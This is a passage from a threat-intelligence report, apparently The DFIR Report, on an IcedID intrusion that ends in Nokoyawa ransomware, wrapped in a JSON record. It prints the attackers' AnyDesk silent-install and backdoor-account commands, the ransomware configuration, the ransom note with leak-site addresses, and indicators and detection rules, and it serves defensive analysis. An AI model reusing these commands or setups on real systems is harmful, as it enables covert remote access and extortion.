$clnt.DownloadFile($url,$file)\r\n cmd.exe /c C:\\ProgramData\\AnyDesk.exe --install C:\\ProgramData\\Any --start-with-win --silent\r\n cmd.exe /c echo btc1000qwe123 | C:\\ProgramData\\Any\\AnyDesk.exe --set-password\r\n #net user AD \"2020\" /add\r\n #net localgroup Administrators InnLine /ADD\r\n #reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccount\r\nThis install script appears to be similar to the previously leaked powershell script used by Conti:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 27 of 40\n\nAnyDesk can be used, either as an installed service (as we can see above) or it can use a portable version. The\r\ndifferences and limitations are written on the official site of AnyDesk. As we are dealing with the ‘installed’\r\nversion, it will leave certain artifacts related to the installed version on the system. Multiple people have written\r\nabout AnyDesk artifacts, such as Inversecos or TylerBrozek, which help a lot during the forensic process related to\r\nAnydesk artifacts.\r\nFor the ad_svc.trace we can find entries like this:\r\ninfo REDACTED gsvc 6600 11452 26 anynet.any_socket - Client-ID: 485343132\r\ninfo REDACTED gsvc 6600 11452 46 anynet.any_socket - Logged in from 152.89\r\ninfo REDACTED gsvc 10136 2256 2515 anynet.any_socket - Client-ID: 547283332\r\ninfo REDACTED gsvc 10136 2256 2515 anynet.any_socket - :54241 on relay ffe9a9\r\nIP Usage ISP Country\r\nAnyDesk Client\r\nID\r\n152.89.196.49\r\nAnyDesk\r\nInteractive\r\nStarcrecium\r\nLimited\r\nRU 485343132\r\n185.29.9.162\r\nAnyDesk\r\nInteractive\r\nDataClub SE 547283332\r\nExfiltration\r\nAfter the threat actors gained access to a file server in the domain, they quickly prepared this machine for\r\nexfiltration. This was performed by downloading the Filezilla FTP client installer using internet explorer on the\r\nserver. The threat actors were so kind to use the sponsored version, to bring some additional PUP’s as well:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 28 of 40\n\nShortly after, the threat actors connected from the file server, using FileZilla, to 45.155.204.5 via SSH and key\r\nexchange can be observed in the network traffic:\r\nIP Usage ISP Country SSH Info:\r\n45.155.204.5\r\nSSH for\r\nFileZilla\r\n3NT\r\nSolutions\r\nLLP\r\nRU\r\nHash:\r\nc561c2cdad206b6ed8469079e037e3f9SSH\r\nVersion: ssh-2.0-filezilla_3.63.2.1\r\nFileZilla can leave behind some nice forensics artifacts (if the installation is not removed). Writing in this blog by\r\nArtifast, a nice overview can be seen. In this case, we were able to recover part of the .xml files resulting in the\r\nbelow correlation between the network data and the host data. While each separate source was already a good\r\nfinding on its own, this combination leaves less room for guessing.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 29 of 40\n\nImpact\r\nThirty-four days after the first infection, and about 28 hours after the beginning of hands-on activity, the threat\r\nactors proceeded to their final actions, deploying Nokayawa ransomware. The variant of Nokoyawa was similar to\r\nthose we’ve already reported on.\r\nAs in most ransomware related cases, before actual deployment, the threat actors looked around to gather\r\ninformation related to backup functionality and systems. In this case, the threat actors moved around between a\r\nfile server and a backup server, making and viewing configurations, dropping and ‘debugging’ the ransomware\r\nand finally cleaning up.\r\nThe threat actors started by using mmc.exe to look into the Local Group Policy by using gpedit.msc. Around 20\r\nminutes later, the threat actors started executing the ransomware script on the file server.\r\nThe ransomware files, in this case svchost.exe and an ‘automation’ file [REDACTED].1.bat , were delivered via\r\nthe AnyDesk sessions as parent process.\r\nThe batch script, [REDACTED].1.bat , launched the executable svchost.exe with a --config parameter,\r\ncontaining a base64 encoded string:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 30 of 40\n\n{\r\nEXTENSION: \"NOKONOKO\",\r\nNOTE_NAME: \"NOKONOKO-readme.txt\",\r\nNOTE_CONTENT: \"\u003cBASE64 ENCODED NOTEBLOB\u003e\",\r\nECC_PUBLIC: \"AHpyfaG1ftdE4NNQ0laC2825GOpTwUw5Y9+WEMkAAAC0Yd7VSOy7D5CxWhHH4pzSYdCXjpPXqEZ2X2r6kgEAAA==\r\nSKIP_DIRS: [\r\n\"windows\",\r\n\"program files\",\r\n\"program files (x86)\",\r\n\"appdata\",\r\n\"programdata\",\r\n\"system volume information\"\r\n],\r\nSKIP_EXTS: [\r\n\".exe\",\r\n\".dll\",\r\n\".ini\",\r\n\".lnk\",\r\n\".url\"\r\n],\r\nENCRYPT_NETWORK: true,\r\nLOAD_HIDDEN_DRIVES: true,\r\nDELETE_SHADOW: true\r\n}\r\nAfter the execution on the file server, the threat actors moved to the backup server, where they repeated their\r\ninterest in the Group Policy. On the backup server, they also opened the server configuration. There appeared to be\r\na problem, as there was some ‘file locking’ in place, likely preventing access. The threat actors tried to circumvent\r\nthese ‘locks’ by utilizing a tool called IOBit. This tool is capable of removing file locks.\r\nAfter this, the ransomware was deployed in the same manner as on the file server. However, there appeared to be a\r\nproblem with the deployment. The threat actors started ProcessHacker and utilized notepad++ to likely fix\r\nsomething related to the ransomware execution. This is based on the fact that, the threat actors executed the\r\nransomware binary 11 times on the backup server and afterwards returned and executed the ransomware a second\r\ntime on the file server. \r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 31 of 40\n\nAfter encrypting the back up server, the threat actors uninstalled the backup software using add/remove programs.\r\nIn addition, notepad was used to view the deployed ransom note after the final execution on the file server. The\r\nNOTE_CONTENT (from above base64 configuration) appears to be base64 encoded again and decoded gives the\r\nfollowing ransom note:\r\nNokoyawa.\r\nIf you see this, your files have been successfully encrypted and stolen.\r\nDon't try to search free decryption method.\r\nIt's impossible.\r\nWe are using symmetrical and asymmetric encryption.\r\nATTENTION:\r\n- Don't rename encrypted files.\r\n- Don't change encrypted files.\r\n- Don't use third party software.\r\nYou are risking irreversibly damaging the file by doing this.\r\nIf you manage to keep things quiet on your end, this will never be known to the public.\r\nTo reach an agreement you have 48 hours to visit our Onion Website.\r\nHow to open Onion links:\r\n- Download TOR Browser from official website.\r\n- Open and enter this link:\r\nhttp://nokopay\u003cREDACTED\u003e\r\n- On the page you will see a chat with the Support.\r\n- Send your first message.\r\nDon't waste your time.\r\nOtherwise all your valuable and sensitive data will be leaked.\r\nOur websites are full of companies that doubted the fact of the data breach or it's extent.\r\n- http://nokoleakb76znymx443veg4n6fytx6spck6pc7nkr4dvfuygpub6jsid.onion/\r\n- http://hl66646wtlp2naoqnhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion/\r\n- http://snatchteam.top\r\nThe threat actors only deployed the ransomware on the two servers and did not perform a domain wide\r\ndeployment. After the ransom of these two systems, the threat actor’s activity ceased.\r\nPlease consider leaving feedback on this report here.\r\nTimeline\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 32 of 40\n\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 33 of 40\n\nDiamond Model\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 34 of 40\n\nIndicators\r\nAtomic\r\nIcedID\r\nmrassociattes[.]com (174.138.188.6)\r\naerilaponawki[.]com (193.149.129.131)\r\nklindriverfor[.]com (5.255.102.167)\r\nalishaskainz[.]com (dr)\r\nCobalt Strike\r\nmsc-mvc-updates[.]com (91.215.85.183)\r\nFileZilla File Exfiltration\r\n45.155.204.5\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 35 of 40\n\nComputed\r\nContract_02_21_Copy#909.one\r\n5f4d630ef00656726401b205ae4dc88f\r\naa8f2d6d98aa535e05685076ca02f781c2aa6464\r\n9c337d27dab65fc3f4b88666338e13416f218ab75c4b5e37cc396241c225efe8\r\nCOIm.jpg\r\nd1da347e78bf043e2dc61638e946c3da\r\nd87a3c22771b1106a1a52d96df7b2944d93fa184\r\n1ab812f7d829444dc703eeb02ea0a955ec839d5e2a9b619d44ac09a91135cad1\r\nGET_ID.bat\r\na59a7916156c52f732b4c2e321facfe1\r\n8c949a7769d16c285347f650ef2eedac01dc1805\r\neae2bce6341ff7059b9382bfa0e0daa337ea9948dd729c0c1e1ee9c11c1c0068\r\nINSTALL.ps1\r\nb1f5e4774aa79f643350218df61e33f6\r\nf1e7994c6568f0182a60f64557c7793df5e550ed\r\nb378c2aa759625de2ad1be2c4045381d7474b82df7eb47842dc194bb9a134f76\r\nagaloz.dll\r\n76a1f94ed6499b99d2cc500998846875\r\nca14d61bcf038cda45199f54c7c452ad262a7c88\r\nd6127d614309acbf2a630fe3fb0fda8e4079dcf2045f91aa400d179751d425f7\r\ncsrss.exe/Funa2.exe\r\nf927cd4f40c7a6dad769a8f9af771a8c\r\n0fdfef7c9cc4305df81b006e898e1592aa822437\r\n06bbb36baf63bc5cb14d7f097745955a4854a62fa3acef4d80c61b4fa002c542\r\nsvchost.exe\r\n8800e6f1501f69a0a04ce709e9fa251c\r\n72a1c9ea93d18309769d8be5cdb3daedf1cddcf5\r\n3c9f4145e310f616bd5e36ca177a3f370edc13cf2d54bb87fe99972ecf3f09b4\r\nDetections\r\nNetwork\r\nET MALWARE Observed DNS Query to IcedID Domain (qoipaboni .com)\r\nET MALWARE Win32/IcedID Request Cookie\r\nET INFO Windows Powershell User-Agent Usage\r\nETPRO INFO HTTP Request with Lowercase accept Header Observed\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 36 of 40\n\nET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)\r\nET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY HTTP traffic on port 443 (POST)\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET SCAN Potential SSH Scan OUTBOUND\r\nET HUNTING Possible Powershell .ps1 Script Use Over SMB\r\nET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File\r\nET HUNTING Suspicious csrss.exe in URI\r\nET INFO Executable Download from dotted-quad Host\r\nET INFO Dotted Quad Host DLL Request\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\nb26feb0b-8891-4e66-b2e7-ec91dc045d58 : AnyDesk Network\r\n50046619-1037-49d7-91aa-54fc92923604 : AdFind Discovery\r\n8a0d153f-b4e4-4ea7-9335-892dfbe17221 : NetScan Share Enumeration Write Access Check\r\nDFIR Private Rules:\r\nbaa9adf9-a01c-4c43-ac57-347b630bf69e : Default Cobalt Strike Named Pipes\r\na526e0c3-d53b-4d61-82a1-76d3d1358a30 : Silent Installation of AnyDesk RMM\r\nb526e0c3-d53b-4d61-82a1-76d3d1358a31 : AnyDesk RMM Password Setup via Command Line\r\n624f1f33-ee38-4bbe-9f4a-088014e0c26b : IcedID Malware Execution Patterns\r\n37948baa-5310-424c-bb18-b29c56be160f : Suspicious Execution of DLL with Unusual File Extensions\r\nSigma Repo:\r\n530a6faa-ff3d-4022-b315-50828e77eef5 : Anydesk Remote Access Software Service Installation\r\n114e7f1c-f137-48c8-8f54-3088c24ce4b9 : Remote Access Tool - AnyDesk Silent Installation\r\nb52e84a3-029e-4529-b09b-71d19dd27e94 : Remote Access Tool - AnyDesk Execution\r\nb1377339-fda6-477a-b455-ac0923f9ec2c : Remote Access Tool - AnyDesk Piped Password Via CLI\r\n065b00ca-5d5c-4557-ac95-64a6d0b64d86 : Remote Access Tool - Anydesk Execution From Suspicious Folder\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\n903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\n0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo\r\n968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity\r\ne568650b-5dcd-4658-8f34-ded0b1e13992 : Potential Product Class Reconnaissance Via Wmic.EXE\r\nfcc6d700-68d9-4241-9a1a-06874d621b06 : Suspicious File Created Via OneNote Application\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 37 of 40\n\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe\r\n811e0002-b13b-4a15-9d00-a613fce66e42 : PUA - Process Hacker Execution\r\nd5866ddf-ce8f-4aea-b28e-d96485a20d3d : Files With System Process Name In Unsuspected Locations\r\n96036718-71cc-4027-a538-d1587e0006a7 : Windows Processes Suspicious Parent Directory\r\nc8557060-9221-4448-8794-96320e6f3e74 : Windows PowerShell User Agent\r\nJoeSecurity Repo:\r\n200068 : Execute DLL with spoofed extension\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/19772/19772.yar\r\nMITRE\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 38 of 40\n\nCredentials In Files - T1552.001\r\nData Encrypted for Impact - T1486\r\nData from Network Shared Drive - T1039\r\nDomain Groups - T1069.002\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 39 of 40\n\nDomain Trust Discovery - T1482\r\nExfiltration Over Alternative Protocol - T1048\r\nFile and Directory Discovery - T1083\r\nIndicator Removal - T1070\r\nIngress Tool Transfer - T1105\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nMasquerade File Type - T1036.008\r\nMasquerading - T1036\r\nNetwork Service Discovery - T1046\r\nPhishing - T1566\r\nPowerShell - T1059.001\r\nProcess Discovery - T1057\r\nProcess Injection - T1055\r\nRegsvr32 - T1218.010\r\nRemote Access Software - T1219\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nRundll32 - T1218.011\r\nScheduled Task - T1053.005\r\nSecurity Software Discovery - T1518.001\r\nSystem Information Discovery - T1082\r\nSystem Owner/User Discovery - T1033\r\nWeb Protocols - T1071.001\r\nWindows Command Shell - T1059.003\r\nWindows Service - T1543.003\r\nInternal case #19772\r\nSource: https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 40 of 40",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/"
	],
	"report_names": [
		"from-onenote-to-ransomnote-an-ice-cold-intrusion"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434078,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/051a69981cfdec4db89081a317572b13207fe85a.pdf",
		"text": "https://archive.orkl.eu/051a69981cfdec4db89081a317572b13207fe85a.txt",
		"img": "https://archive.orkl.eu/051a69981cfdec4db89081a317572b13207fe85a.jpg"
	}
}